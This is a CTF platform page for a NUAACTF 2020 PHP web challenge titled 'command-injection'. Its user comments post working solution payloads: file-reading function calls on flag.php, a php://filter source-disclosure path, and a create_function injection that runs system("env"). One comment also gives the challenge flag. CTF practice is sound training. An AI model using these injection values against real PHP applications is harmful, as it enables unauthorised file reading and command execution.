command-injectionWEB 未解决

分数: 0 金币: 0
所属赛事: NUAACTF 2020
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 246
提  示:
描  述:
nuaactf{}
评论
smtall 3月前

createfun.php?func=highlight_file&arg=flag.php

回复 0

vincentshine 10月前

不知道为啥 http://82.157.146.43:10618/include.php?file=index 可以 显示出来,http://82.157.146.43:10618/include.php?file=createfun就不行

回复 0

xiaobai568 1年前

createfun.php?func=readfile&arg=flag.php,php查看文件的函数都可以试试

回复 0

coolsword2023 1年前

createfun.php?func=create_function&&arg=){}system("env");//

回复 0
xiaoxiao972521 1年前

这个角度清奇哎,我是createfun.php?func=readfile&arg=flag.php

回复 0

zhaiye 1年前

nuaactf{php_IS_thE_best_language}

回复 0

justsosoloveyou 1年前

html注释,cookie,/include.php?file=php://filter/read=convert.base64-encode/resource=createfun, /createfun.php?func=highlight_file&arg=flag.php

回复 2

hopeinhand 2年前

注释有一个include.php,访问发现有文件包含,调出源码后提示createfun.php,发现可以执行自定义函数,show_source flag.php

回复 5

WriteUp

image
2901600657

3 金币

评分(1)

解题动态

孙燕姿圈外男友 攻破了该题 4小时前
LoraenKonpeki 攻破了该题 2天前
daqindiguo 攻破了该题 3天前
tdwj 攻破了该题 3天前
901548546 攻破了该题 3天前
tcqctf 攻破了该题 5天前
xiayanting 攻破了该题 11天前
Susen 攻破了该题 12天前
buuble123 攻破了该题 13天前
LondonBA 攻破了该题 25天前
妈!有人打我 攻破了该题 1月前
15031888502 攻破了该题 1月前
xiongh 攻破了该题 1月前
wnhenry 攻破了该题 1月前
frankptp 攻破了该题 1月前
瓦尔登湖水牛 攻破了该题 1月前
Darker.X 攻破了该题 1月前
15679150282 攻破了该题 1月前
oceanpeak 攻破了该题 1月前
stopandstare 攻破了该题 1月前
问题反馈